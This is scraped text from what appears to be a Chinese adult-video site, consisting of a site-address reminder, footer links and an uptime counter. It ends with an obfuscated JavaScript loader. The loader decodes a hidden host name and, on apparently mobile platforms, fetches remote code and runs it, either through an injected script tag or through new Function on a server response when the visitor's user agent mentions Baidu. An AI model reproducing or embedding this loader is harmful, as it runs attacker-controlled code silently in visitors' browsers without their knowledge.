3.0分

3.0分 第一次爱的网聚903


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};